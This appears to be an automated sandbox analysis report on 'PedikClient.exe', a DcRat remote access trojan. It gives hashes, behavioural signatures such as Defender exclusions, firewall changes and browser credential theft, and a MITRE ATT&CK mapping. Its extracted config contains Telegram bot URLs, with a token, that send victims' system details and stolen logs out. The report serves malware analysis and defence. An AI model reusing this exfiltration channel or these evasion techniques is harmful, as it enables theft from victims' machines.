General
Target: PedikClient.exe
Size: 1.7MB
Sample: 241023-cygelsxakf
MD5: 28d6347c722e5cac5ae9245b16d4754c
SHA1: 45a79b7368ec79516ab1772188bec1b36c43d498
SHA256: eb0e511e7656cf46b8632c82afd2c54fc28ca897fc852229839d67e9a23700e1
SHA512: 643465e266e0bd5b2659d68bd3752cd53c88be29f3fe1805523196c1b3720279e34919f4a6d53c1e3a867f3b1d5c38c4abb8c7d68cce13cc11e62de911aac181
SSDEEP: 49152:MfZ8c3XIwfnWpiDwDFyeEPk3Oy89y1iRW4SEXtTd15:MhVXIwfIdceEPk3O/y1iRW4SutJ15
Static task: static1
Behavioral task: behavioral1
Sample: PedikClient.exe
Resource: win11-20241007-en
Malware Config
Extracted: gurcu
https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendPhoto?chat_id=7706607495&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%E2%80%A2%20Comment%3A%20Arbuzik%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20RPHBTALT%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20138.199.29.44%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%20(x86)%5CGoogle%5Cdwm.ex
https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendDocument?chat_id=7706607495&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.371713
Targets
Target: PedikClient.exe (1.7MB; MD5, SHA1, SHA256, SHA512 and SSDEEP identical to the General section above)
Signatures
DcRat
  DarkCrystal (DC) is a new .NET RAT active since June 2019, capable of loading additional plugins.
Modifies WinLogon for persistence
Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
Boot or Logon Autostart Execution: Active Setup
  Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
Command and Scripting Interpreter: PowerShell
  Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Disables Task Manager via registry modification
Modifies Windows Firewall
Executes dropped EXE
Adds Run key to start application
Checks installed software on the system
  Looks up Uninstall key entries in the registry to enumerate software on the system.
Enumerates connected drives
  Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service
  Uses a legitimate IP lookup service to find the infected system's external IP.
Drops file in System32 directory
MITRE ATT&CK Enterprise v15 (counts in parentheses)
Execution
  Command and Scripting Interpreter (1): PowerShell (1)
  Scheduled Task/Job (1): Scheduled Task (1)
Persistence
  Boot or Logon Autostart Execution (3): Active Setup (1), Registry Run Keys / Startup Folder (1), Winlogon Helper DLL (1)
  Create or Modify System Process (1): Windows Service (1)
  Event Triggered Execution (1): Netsh Helper DLL (1)
  Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
  Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  Boot or Logon Autostart Execution (3): Active Setup (1), Registry Run Keys / Startup Folder (1), Winlogon Helper DLL (1)
  Create or Modify System Process (1): Windows Service (1)
  Event Triggered Execution (1): Netsh Helper DLL (1)
  Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
  Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  Impair Defenses (2): Disable or Modify System Firewall (1), Disable or Modify Tools (1)
  Modify Registry (7)
Credential Access
  Credentials from Password Stores (1): Credentials from Web Browsers (1)
  Unsecured Credentials (1): Credentials In Files (1)